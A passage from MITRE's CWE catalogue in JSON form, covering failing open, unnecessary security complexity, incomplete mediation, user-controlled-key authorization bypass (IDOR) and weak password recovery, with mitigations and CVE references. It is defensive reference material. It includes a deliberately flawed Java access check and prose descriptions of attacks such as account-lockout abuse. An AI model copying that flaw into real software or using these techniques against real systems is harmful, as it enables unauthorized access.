0);DoReallyImportantStuff();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}],"xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-64"},"Intro_Text":"In the following Java snippet, the accessGranted() method is accidentally called with the static ADMIN_ROLES array rather than the user roles.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private static final String[] ADMIN_ROLES = ...;public boolean void accessGranted(String resource, String user) {}private boolean void accessGranted(String resource, String[] userRoles) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"String[] userRoles = getUserRoles(user);return accessGranted(resource, ADMIN_ROLES);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...","xhtml:br":["",""],"xhtml:i":"// grant or deny access based on user roles"}}]}}}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2006-7049","Description":"The method calls the functions with the wrong argument order, which allows remote attackers to bypass intended access restrictions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7049"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"DCL10-C","Entry_Name":"Maintain the contract between the writer and caller of variadic functions"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"EXP37-C","Entry_Name":"Call functions with the correct number and type of arguments","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"DCL00-PL","Entry_Name":"Do not use subroutine prototypes","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"EXP33-PL","Entry_Name":"Do not invoke a function in a context for which it is not defined","Mapping_Fit":"Imprecise"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2007-05-07"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Detection_Factors, Other_Notes, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Detection_Factors, Relationships"}],"Previous_Entry_Name":{"#text":"Incorrectly Specified Arguments","attr":{"@_Date":"2008-04-11"}}}},"636":{"attr":{"@_ID":"636","@_Name":"Not Failing Securely (\'Failing Open\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"When the product encounters an error condition or failure, its design requires it to fall back to a state that is less secure than other options that are available, such as selecting the weakest encryption algorithm or using the most permissive access control restrictions.","Extended_Description":"By entering a less secure state, the product inherits the weaknesses associated with that state, making it easier to compromise. At the least, it causes administrators to have a false sense of security. This weakness typically occurs as a result of wanting to \\"fail functional\\" to minimize administration and support costs, instead of \\"failing safe.\\"","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"755","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"280","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Failing Open"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Intended access restrictions can be bypassed, which is often contradictory to what the product\'s administrator expects."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Subdivide and allocate resources and components so that a failure in one part does not affect the entire product."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Switches may revert their functionality to that of hubs when the table used to map ARP information to the switch interface overflows, such as when under a spoofing attack. This results in traffic being broadcast to an eavesdropper, instead of being sent only on the relevant switch interface. To mitigate this type of problem, the developer could limit the number of ARP entries that can be recorded for a given switch interface, while other interfaces may keep functioning normally. Configuration options can be provided on the appropriate actions to be taken in case of a detected failure, but safe defaults should be used."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-5277","Description":"The failure of connection attempts in a web browser resets DNS pin restrictions. An attacker can then bypass the same origin policy by rebinding a domain name to a different IP address. This was an attempt to \\"fail functional.\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5277"},{"Reference":"CVE-2006-4407","Description":"Incorrect prioritization leads to the selection of a weaker cipher. Although it is not known whether this issue occurred in implementation or design, it is feasible that a poorly designed algorithm could be a factor.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4407"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A7","Entry_Name":"Improper Error Handling","Mapping_Fit":"CWE More Specific"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-522"}}]},"Notes":{"Note":{"#text":"Since design issues are hard to fix, they are rarely publicly reported, so there are few CVE examples of this problem as of January 2008. Most publicly reported issues occur as the result of an implementation error instead of design, such as CVE-2005-3177 (Improper handling of large numbers of resources) or CVE-2005-2969 (inadvertently disabling a verification step, leading to selection of a weaker protocol).","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Name, Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Failing Securely","attr":{"@_Date":"2008-09-09"}},{"#text":"Design Principle Violation: Not Failing Securely (aka \'Failing Open\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Not Failing Securely (aka \'Failing Open\')","attr":{"@_Date":"2009-05-27"}}]}},"637":{"attr":{"@_ID":"637","@_Name":"Unnecessary Complexity in Protection Mechanism (Not Using \'Economy of Mechanism\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses a more complex mechanism than necessary, which could lead to resultant weaknesses when the mechanism is not correctly understood, modeled, configured, implemented, or used.","Extended_Description":"Security mechanisms should be as simple as possible. Complex security mechanisms may engender partial implementations and compatibility problems, with resulting mismatches in assumptions and implemented security. A corollary of this principle is that data specifications should be as simple as possible, because complex data specifications result in complex validation code. Complex tasks and systems may also need to be guarded by complex security checks, so simple systems should be preferred.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Unnecessary Complexity"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Avoid complex security mechanisms when simpler ones would meet requirements. Avoid complex data models, and unnecessarily complex operations. Adopt architectures that provide guarantees, simplify understanding through elegance and abstraction, and that can be implemented similarly. Modularize, isolate and do not trust complex code, and apply other secure programming principles on these modules (e.g., least privilege) to mitigate vulnerabilities."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The IPSEC specification is complex, which resulted in bugs, partial implementations, and incompatibilities between vendors."},{"Intro_Text":"HTTP Request Smuggling (CWE-444) attacks are feasible because there are not stringent requirements for how illegal or inconsistent HTTP headers should be handled. This can lead to inconsistent implementations in which a proxy or firewall interprets the same data stream as a different set of requests than the end points in that stream."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2007-6067","Description":"Support for complex regular expressions leads to a resultant algorithmic complexity weakness (CWE-407).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6067"},{"Reference":"CVE-2007-1552","Description":"Either a filename extension and a Content-Type header could be used to infer the file type, but the developer only checks the Content-Type, enabling unrestricted file upload (CWE-434).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1552"},{"Reference":"CVE-2007-6479","Description":"In Apache environments, a \\"filename.php.gif\\" can be redirected to the PHP interpreter instead of being sent as an image/gif directly to the user. Not knowing this, the developer only checks the last extension of a submitted filename, enabling arbitrary code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6479"},{"Reference":"CVE-2005-2148","Description":"The developer cleanses the $_REQUEST superglobal array, but PHP also populates $_GET, allowing attackers to bypass the protection mechanism and conduct SQL injection attacks against code that uses $_GET.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2148"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-524"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Using Economy of Mechanism","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Use Economy of Mechanism","attr":{"@_Date":"2010-12-13"}}]}},"638":{"attr":{"@_ID":"638","@_Name":"Not Using Complete Mediation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not perform access checks on a resource every time the resource is accessed by an entity, which can create resultant weaknesses if that entity\'s rights or privileges change over time.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"862","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability","Access Control","Other"],"Impact":["Gain Privileges or Assume Identity","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Read Application Data","Other"],"Note":"A user might retain access to a critical resource even after privileges have been revoked, possibly allowing access to privileged functionality or sensitive information, depending on the role of the resource."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Invalidate cached privileges, file handles or descriptors, or other access credentials whenever identities, processes, policies, roles, capabilities or permissions change. Perform complete authentication checks before accepting, caching and reusing data, dynamic content and code (scripts). Avoid caching access control decisions as much as possible."},{"Phase":"Architecture and Design","Description":"Identify all possible code paths that might access sensitive resources. If possible, create and use a single interface that performs the access checks, and develop code standards that require use of this interface."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"When executable library files are used on web servers, which is common in PHP applications, the developer might perform an access check in any user-facing executable, and omit the access check from the library file itself. By directly requesting the library file (CWE-425), an attacker can bypass this access check."},{"Intro_Text":"When a developer begins to implement input validation for a web application, often the validation is performed in each area of the code that uses externally-controlled input. In complex applications with many inputs, the developer often misses a parameter here or a cookie there. One frequently-applied solution is to centralize all input validation, store these validated inputs in a separate data structure, and require that all access of those inputs must be through that data structure. An alternate approach would be to use an external input validation framework such as Struts, which performs the validation before the inputs are ever processed by the code."}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2007-0408","Description":"Server does not properly validate client certificates when reusing cached connections.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0408"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP20","Entry_Name":"Race Condition Window"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"104"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-196"}},{"attr":{"@_External_Reference_ID":"REF-526"}}]},"Content_History":{"Submission":{"Submission_Name":"Pascal Meunier","Submission_Organization":"Purdue University","Submission_Date":"2008-01-18"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Observed_Example, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Design Principle Violation: Not Using Complete Mediation","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Use Complete Mediation","attr":{"@_Date":"2010-12-13"}}]}},"639":{"attr":{"@_ID":"639","@_Name":"Authorization Bypass Through User-Controlled Key","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The system\'s authorization functionality does not prevent one user from gaining access to another user\'s data or record by modifying the key value identifying the data.","Extended_Description":{"xhtml:p":["Retrieval of a user record occurs in the system based on some key value that is under user control. The key would typically identify a user-related record stored in the system and would be used to lookup that record for presentation to the user. It is likely that an attacker would have to be an authenticated user in the system. However, the authorization process would not properly check the data access operation to ensure that the authenticated user performing the operation has sufficient entitlements to perform the requested data access, hence bypassing any other authorization checks present in the system.","For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value.","One manifestation of this weakness is when a system uses sequential or otherwise easily-guessable session IDs that would allow one user to easily switch to another user\'s session and read/modify their data."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Insecure Direct Object Reference / IDOR","Description":"The \\"Insecure Direct Object Reference\\" term, as described in the OWASP Top Ten, is broader than this CWE because it also covers path traversal (CWE-22). Within the context of vulnerability theory, there is a similarity between the OWASP concept and CWE-706: Use of Incorrectly-Resolved Name or Reference."},{"Term":"Broken Object Level Authorization / BOLA","Description":"BOLA is used in the 2019 OWASP API Security Top 10 and is said to be the same as IDOR."},{"Term":"Horizontal Authorization","Description":"\\"Horizontal Authorization\\" is used to describe situations in which two users have the same privilege level, but must be prevented from accessing each other\'s resources. This is fairly common when using key-based access to resources in a multi-user context."}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"Access control checks for specific user data or functionality can be bypassed."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Horizontal escalation of privilege is possible (one user can view/modify information of another user)."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Vertical escalation of privilege is possible if the user-controlled key is actually a flag that indicates administrator status, allowing the attacker to gain administrative access."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"For each and every data access, ensure that the user has sufficient privilege to access the record that is being requested."},{"Phase":["Architecture and Design","Implementation"],"Description":"Make sure that the key that is used in the lookup of a specific user\'s record is not controllable externally by the user or that any tampering can be detected."},{"Phase":"Architecture and Design","Description":"Use encryption in order to make it more difficult to guess other legitimate values of the key or associate a digital signature with the key so that the server can verify that there has been no tampering."}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Alternate_Terms, Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Alternate_Terms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Alternate_Terms"}],"Previous_Entry_Name":{"#text":"Access Control Bypass Through User-Controlled Key","attr":{"@_Date":"2011-03-29"}}}},"640":{"attr":{"@_ID":"640","@_Name":"Weak Password Recovery Mechanism for Forgotten Password","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak.","Extended_Description":{"xhtml:p":["It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Very often the password recovery mechanism is weak, which has the effect of making it more likely that it would be possible for a person other than the legitimate system user to gain access to that user\'s account. Weak password recovery schemes completely undermine a strong password authentication scheme.","This weakness may be that the security question is too easy to guess or find an answer to (e.g. because the question is too common, or the answers can be found using social media). Or there might be an implementation weakness in the password recovery mechanism code that may for instance trick the system into e-mailing the new password to an e-mail account other than that of the user. There might be no throttling done on the rate of password resets so that a legitimate user can be denied service by an attacker if an attacker tries to recover their password in a rapid succession. The system may send the original password to the user rather than generating a new temporary password. In summary, password recovery functionality, if not carefully designed and implemented can often become the system\'s weakest link that can be misused in a way that would allow an attacker to gain unauthorized access to the system."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"287","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"An attacker could gain unauthorized access to the system by retrieving legitimate user\'s authentication credentials."},{"Scope":"Availability","Impact":"DoS: Resource Consumption (Other)","Note":"An attacker could deny service to legitimate system users by launching a brute force attack on the password recovery mechanism using user ids of legitimate users."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"The system\'s security functionality is turned against the system by the attacker."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Make sure that all input supplied by the user to the password recovery mechanism is thoroughly filtered and validated."},{"Phase":"Architecture and Design","Description":"Do not use standard weak security questions and use several security questions."},{"Phase":"Architecture and Design","Description":"Make sure that there is throttling on the number of incorrect answers to a security question. Disable the password recovery functionality after a certain (small) number of incorrect guesses."},{"Phase":"Architecture and Design","Description":"Require that the user properly answers the security question prior to resetting their password and sending the new password to the e-mail address of record."},{"Phase":"Architecture and Design","Description":"Never allow the user to control what e-mail address the new password will be sent to in the password recovery mechanism."},{"Phase":"Architecture and Design","Description":"Assign a new temporary password rather than revealing the original password."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"A famous example of this type of weakness being exploited is the eBay attack. eBay always displays the user id of the highest bidder. In the final minutes of the auction, one of the bidders could try to log in as the highest bidder three times. After three incorrect log in attempts, eBay password throttling would kick in and lock out the highest bidder\'s account for some time. An attacker could then make their own bid and their victim would not have a chance to place the counter bid because they would be locked out. Thus an attacker could win the auction."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":49,"Entry_Name":"Insufficient Password Recovery"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"50"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 19: Use of Weak Password-Based Systems." Page 279"}}},"Notes":{"Note":[{"#text":"This entry might be reclassified as a category or \\"loose composite,\\" since it lists multiple specific errors that can make the mechanism weak. However, under view 1000, it could be a weakness under protection mechanism failure, although it is different from most PMF issues since it is related to a feature that is designed to bypass a protection mechanism (specifically, the lack of knowledge of a password).","attr":{"@_Type":"Maintenance"}},{"#text":"This entry probably needs to be split; see extended description.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Evgeny Lebanidze","Submission_Organization":"Cigital","Submission_Date":"2008-01-30"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content 